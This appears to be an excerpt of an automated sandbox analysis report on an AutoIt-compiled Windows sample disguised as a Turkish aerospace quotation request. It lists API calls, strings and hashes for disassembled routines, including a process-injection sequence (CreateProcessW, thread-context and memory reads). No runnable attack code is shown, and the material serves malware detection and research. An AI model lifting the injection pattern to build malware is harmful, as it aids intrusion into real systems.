                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                    • Opcode ID: beec288486184ddb18241c3528087c9898e8429f42567a9aaa574fff03446639
                                                                                                                                    • Instruction ID: 6bf6cb44a1959a89cc0d34a3657a904c0dc956a6f0396eaa024dd629033f5339
                                                                                                                                    • Opcode Fuzzy Hash: beec288486184ddb18241c3528087c9898e8429f42567a9aaa574fff03446639
                                                                                                                                    • Instruction Fuzzy Hash: BD4158F2604106BBDB346F68DC09F793769FB47390F240119F582D63A5CA6A9E04B761

                                                                                                                                    Control-flow Graph

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                                                                    • API String ID: 1825951767-3513169116
                                                                                                                                    • Opcode ID: 899e281442fe9bf416f7589688144174c2202524c08f49eefdeca04841df2e03
                                                                                                                                    • Instruction ID: f7414daf0bea960b1e80dcf88118e738fc8301f97e88ecc6a0105c7d80ad31be
                                                                                                                                    • Opcode Fuzzy Hash: 899e281442fe9bf416f7589688144174c2202524c08f49eefdeca04841df2e03
                                                                                                                                    • Instruction Fuzzy Hash: D2A15FB2D1021E9ADB04EBA4DC91EEEB779FF16350F44042AF415B7191DF785A08EB60

                                                                                                                                    Control-flow Graph
                                                                                                                                    • Graph image not reproduced; basic blocks 1260b88-1260e8a call CreateFileW, VirtualAlloc, ReadFile, CloseHandle and VirtualFree
                                                                                                                                    APIs
                                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01260C59
                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01260E7F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1492167049.000000000125E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0125E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_125e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 204039940-0
                                                                                                                                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                                    • Instruction ID: 6f7788dbafc4e9e419732ef1a84e2eeafad1e37391545ee4d4aeb40650aed14a
                                                                                                                                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                                    • Instruction Fuzzy Hash: F6A12970E10209EBDB14CFA4C895BEEBBB9FF48304F208559E615BB2C1D775AA80DB54

                                                                                                                                    Control-flow Graph
                                                                                                                                    • Graph image not reproduced; single basic block fa39d5-fa3a45 calls CreateWindowExW * 2 and ShowWindow * 2
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA3A03
                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA3A24
                                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00FA3A38
                                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00FA3A41
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                    • Opcode ID: 36388629160e7f414330786b6740770c525ebe7609d1b6b6d0e65fd5a35c3b5d
                                                                                                                                    • Instruction ID: b97db4279afa3fcdf3e7f47695c4bf2ce72e7b0e3343b2638be5caca9d9e856c
                                                                                                                                    • Opcode Fuzzy Hash: 36388629160e7f414330786b6740770c525ebe7609d1b6b6d0e65fd5a35c3b5d
                                                                                                                                    • Instruction Fuzzy Hash: 63F03A706002927EEA305A23AC09E2B2E7DE7CBF90B10001EF940E2168C26A0800DBB0

                                                                                                                                    Control-flow Graph
                                                                                                                                    • Graph image not reproduced; basic blocks 1260948-1260b43 call CreateFileW, VirtualAlloc, ReadFile and ExitProcess
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 01260838: Sleep.KERNELBASE(000001F4), ref: 01260849
                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01260A7D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1492167049.000000000125E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0125E000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_125e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFileSleep
                                                                                                                                    • String ID: LAU0117DYL3URY9D43KJO
                                                                                                                                    • API String ID: 2694422964-3824852089
                                                                                                                                    • Opcode ID: a6c7066b132d53d99519a30e216317f639ed5dfa13a6879cb46abbfc4214eab7
                                                                                                                                    • Instruction ID: 215f57a7c16b6ee01eef253cc9ead9630e2364eccea7ebbd0650db25024d27d8
                                                                                                                                    • Opcode Fuzzy Hash: a6c7066b132d53d99519a30e216317f639ed5dfa13a6879cb46abbfc4214eab7
                                                                                                                                    • Instruction Fuzzy Hash: 2751A230D14248DAEF11DBF4C854BEEBB79AF19304F104199E249BB2C1D7B91B85CBA5

                                                                                                                                    Control-flow Graph
                                                                                                                                    • Graph image not reproduced; basic blocks fa407c-fdd41e call LoadStringW and Shell_NotifyIconW
                                                                                                                                    APIs
                                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FDD3D7
                                                                                                                                      • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
                                                                                                                                    • _memset.LIBCMT ref: 00FA40FC
                                                                                                                                    • _wcscpy.LIBCMT ref: 00FA4150
                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FA4160
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                    • String ID: Line:
                                                                                                                                    • API String ID: 3942752672-1585850449
                                                                                                                                    • Opcode ID: 6c790eeaa3fa0b13828bb85f6dcc4db6bbd216215ad03ba656b424ac79eb4435
                                                                                                                                    • Instruction ID: c019dbc3a5b67a3bae2bb86c2a7c3c463eb41f9564fb8e2f247e9c16f5f56e18
                                                                                                                                    • Opcode Fuzzy Hash: 6c790eeaa3fa0b13828bb85f6dcc4db6bbd216215ad03ba656b424ac79eb4435
                                                                                                                                    • Instruction Fuzzy Hash: C931D0B1408301AFD331EB60DC46FDB77E8AF86354F14451EF5C582091EBB8A648E792

                                                                                                                                    Control-flow Graph
                                                                                                                                    • Graph image not reproduced; basic blocks fc541d-fc55e0, internal calls only (no Windows API calls in this routine)
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1559183368-0
APIs
  • Part of subcall function 00FA4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FA4E0F
• _free.LIBCMT ref: 00FDE263
• _free.LIBCMT ref: 00FDE2AA
  • Part of subcall function 00FA6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FA6BAD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• API String ID: 2861923089-1757145024
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00FA35A1,SwapMouseButtons,00000004,?), ref: 00FA35D4
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00FA35A1,SwapMouseButtons,00000004,?,?,?,?,00FA2754), ref: 00FA35F5
• RegCloseKey.KERNELBASE(00000000,?,?,00FA35A1,SwapMouseButtons,00000004,?,?,?,?,00FA2754), ref: 00FA3617
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 01260065
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01260089
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012600AB
Memory Dump Source
• Source File: 00000000.00000002.1492167049.000000000125E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0125E000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_125e000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
  • Part of subcall function 00FA4EE5: _fseek.LIBCMT ref: 00FA4EFD
  • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009824
  • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009837
• _free.LIBCMT ref: 010096A2
• _free.LIBCMT ref: 010096A9
• _free.LIBCMT ref: 01009714
  • Part of subcall function 00FC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FC9A24), ref: 00FC2D69
  • Part of subcall function 00FC2D55: GetLastError.KERNEL32(00000000,?,00FC9A24), ref: 00FC2D7B
• _free.LIBCMT ref: 0100971C
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
APIs
• _memset.LIBCMT ref: 00FDEA39
• GetOpenFileNameW.COMDLG32(?), ref: 00FDEA83
  • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
  • Part of subcall function 00FC0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FC07B0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X
• API String ID: 3777226403-3081909835
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 010098F8
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0100990F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
                                                                                                                                    • Opcode ID: b5ce44f130fc6266d11c337da5e2eb92904f758bcac9be0d10782eb42ee553bf
                                                                                                                                    • Instruction ID: 5eeb89e10f9ea7337118097439f4a057dea7a0df6f50fc3a3ed36be0497acabb
                                                                                                                                    • Opcode Fuzzy Hash: b5ce44f130fc6266d11c337da5e2eb92904f758bcac9be0d10782eb42ee553bf
                                                                                                                                    • Instruction Fuzzy Hash: 90D05E7954030EABDB709EA0EC0EFAA773CE705700F1042A1FE94D5191EAB695988BA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5a32c5fd448ffe1800403b1c296be70684a875cc065d95dee49337f16c902a55
                                                                                                                                    • Instruction ID: 304708f059a1a4b31da32ca0164478eb317e6fada54abb4ce8adf86e11ecfe85
                                                                                                                                    • Opcode Fuzzy Hash: 5a32c5fd448ffe1800403b1c296be70684a875cc065d95dee49337f16c902a55
                                                                                                                                    • Instruction Fuzzy Hash: AEF168706083019FDB14DF28C980A6EBBE5FF89314F54896EF8999B251D778E905CF82
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FC0193
                                                                                                                                      • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FC019B
                                                                                                                                      • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FC01A6
                                                                                                                                      • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FC01B1
                                                                                                                                      • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FC01B9
                                                                                                                                      • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FC01C1
                                                                                                                                      • Part of subcall function 00FB60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FAF930), ref: 00FB6154
                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FAF9CD
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00FAFA4A
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FE45C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1986988660-0
                                                                                                                                    • Opcode ID: 67e2ee872999ba867f83b80a7e6670df1c63c9a3d429a5655d0e344ce6e82fa1
                                                                                                                                    • Instruction ID: ed26bc26b7e6eb4b977ccc7c96886c3d9bc7f166b82bbb09198ffee63789b12a
                                                                                                                                    • Opcode Fuzzy Hash: 67e2ee872999ba867f83b80a7e6670df1c63c9a3d429a5655d0e344ce6e82fa1
                                                                                                                                    • Instruction Fuzzy Hash: DD81D1B0A01250CFC3A4DF39EC556597BE9FB9938AB5081AAD0D8CB369EB7E4404CF10
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00FA4370
                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA4415
                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FA4432
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconNotifyShell_$_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1505330794-0
                                                                                                                                    • Opcode ID: 8f5adeb10554f78e938672ab52fe85f5c0d4db1455886dc33fc85b2d99b5f8df
                                                                                                                                    • Instruction ID: 6ce78b3c165a062d9dd6f3399d4366eae951f5391e3aaa8a60b2b2cc01c68b84
                                                                                                                                    • Opcode Fuzzy Hash: 8f5adeb10554f78e938672ab52fe85f5c0d4db1455886dc33fc85b2d99b5f8df
                                                                                                                                    • Instruction Fuzzy Hash: 053181B09047028FD731DF24D88469BBBF8FB9A358F00092EF5DA86241D7B5B944DB52
                                                                                                                                    APIs
                                                                                                                                    • __FF_MSGBANNER.LIBCMT ref: 00FC5733
                                                                                                                                      • Part of subcall function 00FCA16B: __NMSG_WRITE.LIBCMT ref: 00FCA192
                                                                                                                                      • Part of subcall function 00FCA16B: __NMSG_WRITE.LIBCMT ref: 00FCA19C
                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 00FC573A
                                                                                                                                      • Part of subcall function 00FCA1C8: GetModuleFileNameW.KERNEL32(00000000,010633BA,00000104,?,00000001,00000000), ref: 00FCA25A
                                                                                                                                      • Part of subcall function 00FCA1C8: ___crtMessageBoxW.LIBCMT ref: 00FCA308
                                                                                                                                      • Part of subcall function 00FC309F: ___crtCorExitProcess.LIBCMT ref: 00FC30A5
                                                                                                                                      • Part of subcall function 00FC309F: ExitProcess.KERNEL32 ref: 00FC30AE
                                                                                                                                      • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                                                                                    • RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,00000000,?,?,?,00FC0DD3,?), ref: 00FC575F
                                                                                                                                    Memory Dump Source
